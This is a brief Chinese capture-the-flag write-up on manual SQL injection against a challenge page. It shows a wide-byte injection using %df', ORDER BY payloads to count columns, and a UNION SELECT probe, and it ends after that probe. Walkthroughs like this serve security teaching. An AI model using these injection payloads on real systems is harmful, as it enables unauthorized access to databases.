ctf:有趣的注入
(一)手注:
url:http://ctf.cdusec.org:8086/sqli.php?id=1
实验工具:火狐hackbar
x001:
输入:” ‘ “单引号无反应,再输入" %df’ "(宽字节注入,显示报错。)
截图:
x002判断列数:判断出来有3列。
http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +
http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 4 -- +
x003判断注入点:
http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,3 -- +